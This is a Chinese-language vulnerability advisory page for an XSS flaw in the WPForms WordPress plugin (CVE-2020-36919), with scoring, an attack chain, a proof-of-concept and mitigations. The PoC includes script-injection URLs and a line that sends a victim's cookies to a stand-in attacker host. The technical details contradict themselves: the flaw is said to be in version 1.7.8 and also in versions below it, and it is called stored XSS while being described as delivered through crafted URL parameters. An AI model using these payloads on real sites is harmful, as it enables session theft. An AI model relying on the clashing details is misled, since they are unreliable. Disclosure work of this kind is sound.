CVE-2020-36919 CVSS 6.1 中危

CVE-2020-36919 WPForms跨站脚本漏洞

披露日期: 2026-01-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2020-36919

漏洞类型

XSS (跨站脚本)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WPForms

漏洞概述

CVE-2020-36919是WordPress插件WPForms 1.7.8版本中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞位于插件的滑块导入搜索功能（slider import search feature）和tab参数中。攻击者可以通过ListTable.php端点注入恶意脚本，当受害者访问受影响的页面时，这些恶意JavaScript代码会在受害者的浏览器中执行。攻击者可以利用此漏洞窃取用户的会话令牌、劫持用户账户、修改页面内容或进行钓鱼攻击。由于该漏洞不需要认证即可利用，且影响WordPress广泛使用的表单插件，因此具有较高的实际威胁性。建议用户尽快升级到最新版本的WPForms插件以修复此安全漏洞。

技术细节

该漏洞存在于WPForms插件的ListTable.php文件中，具体位于slider导入功能的搜索功能和tab参数处理逻辑中。攻击者构造特制的URL参数，在tab参数或搜索框中注入恶意JavaScript代码。由于插件未对用户输入进行充分的输出编码和验证，恶意脚本会被存储在数据库中。当管理员或其他用户访问包含恶意代码的页面时，浏览器会将其解析为可执行脚本，从而触发XSS攻击。攻击者可以利用此漏洞获取管理员的cookie信息、进行CSRF攻击或修改网站内容。CVSS 3.1评分6.1（AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N）表明该漏洞可通过网络利用，无需特殊权限，但需要用户交互。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用的WPForms插件版本，确认版本低于1.7.8

STEP 2

步骤2

攻击者构造包含恶意JavaScript代码的特制URL，注入到tab参数或搜索功能中

STEP 3

步骤3

通过ListTable.php端点将恶意脚本注入到页面中，由于缺乏输入验证，脚本被存储

STEP 4

步骤4

受害者（管理员或用户）访问包含恶意代码的页面

STEP 5

步骤5

浏览器执行恶意JavaScript，攻击者获取受害者cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2020-36919 XSS PoC -->
<!-- Target: WordPress site with WPForms < 1.7.8 -->

<!-- XSS via tab parameter in ListTable.php -->
https://target-site.com/wp-admin/admin.php?page=wpforms-builder&view=sliders&tab=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

<!-- XSS via slider import search feature -->
<!-- Inject payload in the search field -->
<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

<!-- Example malicious URL for reference -->
<!-- http://vulnerable-site.com/wp-admin/admin.php?page=wpforms-builder&tab="><script>alert('XSS')</script> -->

影响范围

WPForms < 1.7.8

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 限制非管理员用户访问WPForms管理界面；2) 使用Web应用防火墙（WAF）过滤恶意请求；3) 禁用slider导入功能直到完成升级；4) 监控访问日志中的异常请求模式。建议尽快安排计划进行插件升级以彻底消除该安全风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表